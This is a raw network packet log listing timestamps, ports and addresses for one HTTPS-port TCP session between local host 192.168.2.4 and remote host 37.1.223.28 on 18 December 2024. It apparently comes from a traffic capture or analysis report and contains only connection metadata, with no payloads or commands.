Dec 18, 2024 23:06:14.166321993 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.166337967 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.166383982 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.166452885 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.171674013 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.171705008 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.171752930 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.171772003 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.171791077 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.171812057 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.237961054 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.237988949 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.238075018 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.238097906 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.238126040 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.238234997 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.325285912 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.325311899 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.325432062 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.325432062 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.325489998 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.325815916 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.331582069 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.331605911 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.331718922 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.331718922 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.331742048 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.335748911 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.337951899 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.337975025 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.338080883 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.338082075 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.338098049 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.338203907 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.344930887 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.344990015 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.345041037 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.345058918 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.345107079 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.345160007 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.350591898 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.350644112 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.350694895 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.350709915 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.350753069 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.350806952 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.357898951 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.357944012 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.357990980 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.358009100 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.358036995 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.358809948 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.363727093 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.363770008 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.363812923 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.363826990 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.363866091 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.364013910 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.430124044 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.430171013 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.430221081 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.430237055 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.430268049 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.430636883 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.518279076 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.518326044 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.518373966 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.518394947 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.518429041 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.518469095 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.524506092 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.524552107 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.524600029 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.524610043 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.524641991 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.525008917 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.531286955 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.531352043 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.531394958 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.531407118 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.531435966 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.531516075 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.537101030 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.537144899 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.537261963 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.537261963 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.537309885 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.537553072 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.543947935 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.543991089 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.544102907 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.544104099 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.544137001 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.544183016 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.550201893 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.550247908 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.550344944 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.550344944 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.550373077 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.550848961 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.557014942 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.557054996 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.557099104 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.557126045 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.557157040 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.557507992 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.622385025 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.622441053 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.622539043 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.622589111 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.622638941 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.622756004 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.710541964 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.710619926 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.710791111 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.710792065 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.710829020 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.715152025 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.716908932 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.716953993 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.717076063 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.717076063 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.717103958 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.717269897 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.723179102 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.723237991 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.723289967 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.723308086 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.723356009 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.723751068 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.729935884 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.729955912 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.730627060 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.730644941 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.730751991 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.735770941 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.735786915 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.736166000 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.736187935 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.736284018 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.742929935 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.742944002 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.743067026 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.743081093 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.743170023 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.748888016 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.748907089 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.749080896 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.749099016 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.749288082 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.814466953 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.814486027 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.814733028 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.814748049 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.819807053 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.902292967 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.902316093 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.902554989 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.902573109 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.902848005 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.909074068 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.909096956 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.909297943 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.909307957 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.909671068 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.914973974 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.915000916 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.915304899 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.915321112 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.919138908 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.921643972 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.921668053 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.921781063 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.921789885 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.921924114 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.928461075 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.928483963 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.929512024 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.929521084 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.929792881 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.934766054 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.934783936 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.935017109 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.935024977 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.939753056 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.941580057 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.941596985 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.941978931 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:14.941988945 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:14.942368984 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.006752968 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.006772995 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.006894112 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.006932974 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.007189989 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.094297886 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.094320059 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.094877958 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.094916105 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.095901966 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.101005077 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.101022959 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.101260900 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.101260900 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.101281881 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.102065086 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.107865095 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.107886076 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.108031034 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.108047009 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.108165026 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.113671064 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.113697052 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.114038944 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.114054918 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.114418983 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.120460033 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.120481014 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.120569944 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.120588064 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.120630026 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.120695114 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.126837969 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.126857996 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.127125978 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.127140045 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.130608082 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.133569002 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.133586884 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.133776903 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.133790016 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.133938074 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.198416948 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.198436022 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.198636055 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.198678970 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.204013109 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.286752939 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.286767960 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.286847115 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.286870003 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.286925077 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.293095112 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.293108940 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.293176889 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.293190956 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.293241024 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.299876928 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.299891949 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.299954891 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.299967051 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.300019979 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.305716038 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.305730104 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.305784941 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.305798054 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.305829048 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.305850029 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.312546015 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.312567949 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.312625885 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.312638998 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.312664986 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.312705040 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.318837881 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.318851948 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.318923950 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.318937063 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.318995953 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.325592041 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.325607061 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.325664997 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.325678110 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.326111078 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.390877962 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.390892982 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.391113043 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.391129971 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.391185999 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.478749037 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.478764057 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.478831053 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.478847027 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.478897095 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.478919983 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.485070944 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.485086918 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.485157013 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.485169888 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.485224962 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.491878033 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.491892099 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.491966009 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.491977930 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.492033958 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.497685909 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.497700930 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.497771025 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.497781992 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.497836113 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.504533052 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.504547119 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.504612923 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.504626036 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.504679918 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.510822058 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.510837078 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.510898113 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.510910988 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.510957956 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.517414093 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.517431021 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.517488003 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.517499924 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.517529011 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.517568111 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.582794905 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.582851887 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.582937002 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.582973957 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.583008051 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.583030939 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.670947075 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.671000004 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.671058893 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.671087027 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.671122074 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.671142101 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.677244902 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.677292109 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.677337885 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.677355051 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.677386045 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.677408934 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.679610968 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.679687023 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.679702997 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.679764986 CET	49732	443	192.168.2.4	37.1.223.28
Dec 18, 2024 23:06:15.679857969 CET	443	49732	37.1.223.28	192.168.2.4
Dec 18, 2024 23:06:15.679918051 CET	49732	443	192.168.2.4	37.1.223.28
